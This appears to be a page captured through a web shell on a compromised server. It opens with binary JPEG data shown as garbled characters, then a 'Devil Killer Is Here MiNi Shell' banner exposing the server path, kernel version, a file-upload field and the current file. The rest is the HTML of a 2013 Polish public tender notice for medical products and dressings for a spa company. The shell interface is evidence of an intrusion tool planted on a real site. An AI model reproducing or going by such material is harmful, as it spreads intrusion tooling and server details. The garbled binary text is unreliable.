JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130812/324158-N-2013.html

<p class="kh_header"><b>Lądek-Zdrój: Sukcesywne dostawy produktów leczniczych i wyrobów medycznych dla Uzdrowiska Lądek-Długopole S.A.</b><br>
<b>Numer ogłoszenia: 324158 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Lądek-Długopole S.A. , ul. Wolności 4, 57-540 Lądek-Zdrój, woj. dolnośląskie, tel. 74 8 115 470, faks 74 8 115 470.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko-ladek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Podmiot Leczniczy - Spółka Akcyjna Województwa Dolnośląskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy produktów leczniczych i wyrobów medycznych dla Uzdrowiska Lądek-Długopole S.A..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia są:  Sukcesywne dostawy produktów leczniczych i wyrobów  medycznych  dla Uzdrowiska Lądek-Długopole  S.A.  Zamawiający  dopuszcza składanie ofert częściowych na dowolną ilość  części  (liczba części - 5).                                                                               
Zamówienie polega na sukcesywnej dostawie produktów leczniczych oraz wyrobów medycznych takich jak: środki opatrunkowe,  drobny  sprzęt medyczny  jednorazowego użytku, środki do mycia i dezynfekcji oraz pasta i  plastry borowinowe dla Uzdrowiska Lądek-Długopole  S.A.
Orientacyjny wykaz produktów leczniczych i innych wyrobów medycznych objętych zamówieniem,  wraz  z  zapotrzebowaniem na 12 miesięcy, przedstawiają  załączniki nr 1a,1b,1c,1d i 1e do SIWZ.
Wykaz produktów leczniczych i wyrobów medycznych (szacunkowy)  podany w załącznikach  nr 1a , 1b, 1c i 1d i 1e - formularzach cenowych, został przygotowany  w oparciu o aktualnie obowiązujący  w firmie   Receptariusz - uzdrowiskową  listę produktów leczniczych i wyrobów medycznych.
Zamawiający wymaga, aby ceny produktów leczniczych i wyrobów  medycznych, o których mowa w załącznikach nr 1a,1b,1c,1d i 1e do SIWZ były stałe. Jednakże Zamawiający dopuszcza  możliwość zmiany cen,  ale nie częściej niż raz na kwartał, pod warunkiem, iż zmiany cen będą wynikały  ze: 
zmiany cen  u producenta krajowego, zmiany cen  urzędowych w chwili  zmiany ich przez Ministra Zdrowia, zmiany  u  bezpośredniego importera, zmiany stawki VAT,
przy czym zmiana cen  będzie następowała  o taki sam procent jaki wynika z podwyżek niezależnych od Wykonawcy.
W przypadku zmian, o których mowa wyżej w tirecie pierwszym i trzecim Wykonawca  powiadomi Zamawiającego o propozycji zmian  cen w terminie nie dłuższym niż  7 dni roboczych od daty powzięcia wiadomości o ich zmianie, przy czym ewentualna zmiana ceny następować będzie od pierwszego dnia kwartału następującego po dacie  wprowadzenia zmian. W przypadku zmian cen urzędowych i zmiany stawki podatku VAT od towarów i  usług (tiret drugi i czwarty powyżej) zmiana ceny obowiązuje od daty wejścia w życie stosownego aktu ustalającego nowe stawki cen lub podatku VAT.
Przedmiot zamówienia przedstawiony w ofercie musi posiadać stosowne  Świadectwa Rejestracji w Urzędowym wykazie Produktów Leczniczych, dopuszczające je  do obrotu i stosowania w Ochronie  Zdrowia na  terenie RP oraz karty Charakterystyki. Wykonawca na każde wezwanie Zamawiającego jest zobowiązany dostarczyć taki dokument.
Oferowane produkty lecznicze i wyroby medyczne  muszą posiadać termin ważności liczony  minimum 1 rok od daty dostawy, oraz spełniać wymogi określone w obowiązujących dla nich normach i pozwoleniach.
Wykonawca ponosi pełną odpowiedzialność za jakość dostarczanych produktów     leczniczych i wyrobów medycznych oraz gwarantuje zgodność  serii i dat ważności na fakturze z  faktycznie dostarczonymi produktami i wyrobami.
O każdej dostawie Wykonawca ma obowiązek powiadomić Zamawiającego z 1-dniowym wyprzedzeniem przed planowanym terminem dostawy.
Zamawiający uzależnia  stopień wykorzystania ilości umownych  produktów leczniczych i wyrobów  medycznych od umów podpisanych NFZ i ZUS i   liczby pacjentów zakwalifikowanych do leczenia  i  zastrzega   sobie  możliwość zmian ilościowo-asortymentowych zamawianych produktów  a szczególnie produktów leczniczych  oraz możliwość przesunięć  ilościowych  między dwiema dawkami.
Zamawiający będzie zamawiał produkty lecznicze i wyroby medyczne w zależności od potrzeb.
Zamawiający  dopuszcza możliwość zaoferowania produktów (równoważnych).
Zamawiający wymaga aby, preparat-produkt równoważny charakteryzował się tym samym składem chemicznym , dawką , przeznaczeniem, spektrum i czasem  działania. 
REALIZACJA   DOSTAW:
W zakresie części 1, 2, 3 i 4:
Dostawy wykonywane będą według  zamówień cząstkowych składanych telefonicznie  lub faksem przez Kierownika Działu Farmacji Szpitalnej Zamawiającego, transportem Wykonawcy i na jego koszt,  w ciągu 3 dni od dnia złożenia zamówienia  (z  wyłączeniem dni  ustawowo  wolnych od pracy tj. sobót, niedziel i świąt ) w godzinach  od  7:00 do 14:00 do budynku Zarządu  przy. ul. Wolności 4 w Lądku Zdroju.
W sytuacjach wyjątkowych dopuszcza się możliwość składania zamówień na określone  produkty lecznicze z realizacją na cito w ciągu - max 24 godzin. W zakresie części 5:
Dostawy wykonywane będą według  zamówień cząstkowych składanych telefonicznie  lub faksem przez  upoważnionego pracownika Zamawiającego, do Zakładu Przyrodoleczniczego KAROL przy ul.  Zdrojowej 16, w  Długopolu Zdroju, transportem Wykonawcy i na jego koszt,  w ciągu  7 dni od dnia złożenia zamówienia  (z  wyłączeniem dni  ustawowo  wolnych  od pracy tj. sobót, niedziel i świąt ) w godzinach  od  7:00 do 14:00. 
Zakres zamówienia zawiera się w kwocie szacunkowej poniżej progów ustalonych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolisty Dz.U. 2010r. Nr 113, poz. 759 z póź. zm., zwanej dalej Pzp).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.14.00.00-3, 33.14.10.00-0, 33.14.11.00-1, 33.14.12.00-2, 33.14.13.10-6, 33.14.13.20-9, 33.63.16.00-8, 33.63.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna: 
1)  przedłożenie koncesji,  zezwolenia  na obrót  produktami leczniczymi i wyrobami medycznymi (jeżeli dotyczy) lub oświadczenia, że posiadanie koncesji, zezwolenia  nie jest wymagane przepisami,
2)  przedłożenie zezwolenia  na wytwarzanie wyrobu medycznego (dotyczy tylko części 5  zamówienia),  
3)  przedłożenie zezwolenia na obrót środkami psychotropowymi (dotyczy tylko części 1 zamówienia)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie wykazu wykonanych, a  w  przypadku świadczeń okresowych lub ciągłych również  wykonywanych dostaw  w zakresie niezbędnym do wykazania spełniania warunku  wiedzy   i  doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania  ofert  a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, tj. zrealizował min. 1 dostawę dla każdej z części zamówienia, polegającą na dostarczeniu produktów leczniczych i-lub wyrobów  medycznych o wartości brutto  co najmniej : 64 000,00 zł dla części 1, 9 000,00 zł dla  części 2, 34 000,00 zł dla  części 3, 66 000,00 zł  dla części 4  i  35 000,00 zł dla części 5,  oraz  załączeniem dowodów  (minimalnie jednego dla każdej części) potwierdzających,  że te dostawy  zostały wykonane lub są wykonywane  należycie - wg  zał. nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o posiadaniu potencjału technicznego pozwalającego na wykonanie zamówienia zgodnie z zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o dysponowaniu osobami zdolnymi do wykonania zamówienia zgodnie z zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o odpowiedniej sytuacji ekonomicznej i finansowej pozwalającej na wykonanie zamówienia zgodnie z zał. nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zrealizowanie  minimalnie jednej dostawy dla każdej części zamówienia polegającej na dostawie produktów leczniczych i lub wyrobów medycznych  o wartości brutto co najmniej  64 000, 00 zł dla części 1; 9 000,00 zł dla części 2; 34 000,00 zł dla części 3; 66 000,00 zł dla części 4 i 35 000,00 zł dla części 5 
oraz załączeniem dowodów (minimalnie jednego dla każdej części) potwierdzających, że dostawy zostały lub są wykonywane należycie - wg zał nr 5 do SIWZ.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz ofertowy wg zał. nr 1 do SIWZ. 2. Wypełnione i podpisane formularze cenowe - wg zał. nr 1a,1b,1c,1d i 1e do SIWZ. 3. Zaakceptowany(zaparafowany) projekt umowy - wg zał. nr 4 do SIWZ. 4. Oświadczenie o Świadectwach Rejestracji w Urzędowym Wykazie Produktów Leczniczych przedmiotu zamówienia - wg zał. nr 6 do SIWZ. 5. Dokument lub pełnomocnictwo, z których wynika uprawnienie osoby(osób) do składania oświadczeń woli i reprezentowania Wykonawcy, jeżeli to prawo nie wynika z właściwego rejestru. W takiej sytuacji dokument ten lub pełnomocnictwo muszą być integralną częścią oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający wymaga stałości cen produktów leczniczych i wyrobów medycznych w okresie obowiązywania umowy  ale  dopuszcza  możliwość  zmian  cen (nie częściej niż raz  na kwartał )niezależnych od Wykonawcy a  zależnych od:
-  zmian cen u  producenta krajowego,
-  zmian cen urzędowych w chwili zmiany ich przez Ministra Zdrowia,
-  zmian cen u bezpośredniego importera,
-  zmiany stawki VAT
przy czym zmiana  cen będzie następowała o taki sam procent jaki wynika z podwyżek niezależnych od Wykonawcy.
2. W przypadku zmian, o których mowa wyżej w tirecie pierwszym i trzecim Wykonawca powiadomi Zamawiającego o propozycji zmian  cen w terminie nie dłuższym niż  7 dni roboczych od daty powzięcia wiadomości o ich zmianie, przy czym ewentualna zmiana ceny następować będzie od pierwszego dnia kwartału następującego po dacie  wprowadzenia zmian.
W przypadku zmian cen urzędowych i zmiany stawki podatku VAT od towarów i  usług (tiret drugi i czwarty powyżej) zmiana ceny obowiązuje od daty wejścia w życie stosownego  aktu ustalającego nowe stawki cen lub podatku VAT.
3. Propozycja zmiany cen będzie przesyłana przez Wykonawcę Zamawiającemu w terminie podanym w §2 pkt. 2, w postaci faksu na nr tel. 74/ 811-54-70 lub maila na adres: grazyna.kus@uzdrowisko-ladek.pl.
4. Zamawiający niniejszym zastrzega, iż dopuszcza zamówienie większej/mniejszej ilości produktów leczniczych wg zał. nr  1a i-lub wyrobów medycznych wg zał. nr 1b i 1c niż przewidziana w  umowie, w zależności od potrzeb uzależnionych od stanu zdrowa pacjentów przybyłych do Zamawiającego - czego w dniu zawarcia  umowy nie można było przewidzieć przy czym suma wartości zrealizowanych dostaw nie może przekroczyć wysokości kwoty brutto przeznaczonej pzrez Zamawiającego na realizację zamówienia w danej części zamówienia.
5.  Strony dopuszczają zmianę cen jednostkowych preparatów objętych umową w przypadku zmiany wielkości opakowania wprowadzonej przez producenta z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową. Zmiana wielkości opakowania nie może mieć wpływu na zmianę ogólnej ilości produktów objętych umową.
6. Zamawiający ma prawo zamówić produkty lecznicze i wyroby medyczne  spoza zakresu określonego w załącznikach  nr 1a, 1b i 1c.
7. W przypadku określonym  powyżej Wykonawca zobowiązany jest do ich dostawy zgodnie z postanowieniami  umowy wg najniższego cennika  obowiązującego u Wykonawcy w dniu zlecenia dostawy z uwzględnieniem marży/upustu zaoferowanego w ofercie.
8. Wykonawca jest zobowiązany, na każde żądanie Zamawiającego przedłożyć w formie pisemnej  aktualny cennik sprzedawanych  produktów leczniczych i wyrobów medycznych zawierający najniższe ceny.
9. Zamawiający uzależnia  stopień wykorzystania ilości umownych  produktów leczniczych i wyrobów  medycznych od umów podpisanych NFZ i ZUS i   liczby pacjentów zakwalifikowanych do leczenia  i  zastrzega   sobie  możliwość zmian ilościowo-asortymentowych zamawianych produktów  a szczególnie produktów leczniczych  oraz możliwość przesunięć  ilościowych  między dwiema dawkami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko-ladek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Lądek-Długopole S.A., ul. Wolności 4, 57-540 Lądek-Zdrój, pokój nr 4 (Dział Zamówień Publicznych i Zaopatrzenia).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2013 godzina 10:00, miejsce: Uzdrowisko Lądek-Długopole S.A., ul. Wolności 4, 57-540 Lądek-Zdrój, pokój nr 105 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywne dostawy produktów leczniczych dla Uzdrowiska Lądek-Długopole S.A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy produktów leczniczych zgodnie z formularzem cenowym - zał. nr 1a do SIWZ,  transportem Wykonawcy i na jego koszt,  w ciągu 3 dni od dnia złożenia zamówienia  (z  wyłączeniem dni  ustawowo  wolnych od pracy tj. sobót, niedziel i świąt ) w godzinach  od  7:00 do 14:00 do budynku Zarządu  przy. ul. Wolności 4 w Lądku Zdroju. Zakres zamówienia zawiera się w kwocie powyżej 14 tys. Euro.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Marża - 2</li>
<li>3. Upust - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywne dostawy środków opatrunkowych dla Uzdrowiska Lądek-Długopole S.A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy środków opatrunkowych zgodnie z formularzem cenowym - zał. nr 1b do SIWZ,  transportem Wykonawcy i na jego koszt,  w ciągu 3 dni od dnia złożenia zamówienia  (z  wyłączeniem dni  ustawowo  wolnych od pracy tj. sobót, niedziel i świąt ) w godzinach  od  7:00 do 14:00 do budynku Zarządu  przy. ul. Wolności 4 w Lądku Zdroju. Zakres zamówienia zawiera się w kwocie poniżej 14 tys. Euro.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Marża - 2</li>
<li>3. Upust - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywne dostawy drobnego sprzętu medycznego jednorazowego użytku dla Uzdrowiska Lądek-Długopole S.A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy drobnego sprzętu medycznego jednorazowego użytku  zgodnie z formularzem cenowym - zał. nr 1c do SIWZ,  transportem Wykonawcy i na jego koszt,  w ciągu 3 dni od dnia złożenia zamówienia  (z  wyłączeniem dni  ustawowo  wolnych od pracy tj. sobót, niedziel i świąt ) w godzinach  od  7:00 do 14:00 do budynku Zarządu  przy. ul. Wolności 4 w Lądku Zdroju. Zakres zamówienia zawiera się w kwocie poniżej 14 tys. Euro.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3, 33.14.12.00-2, 33.14.13.10-6, 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Marża - 2</li>
<li>3. Upust - 3</li>
</ul>
</li>
</ul><br>
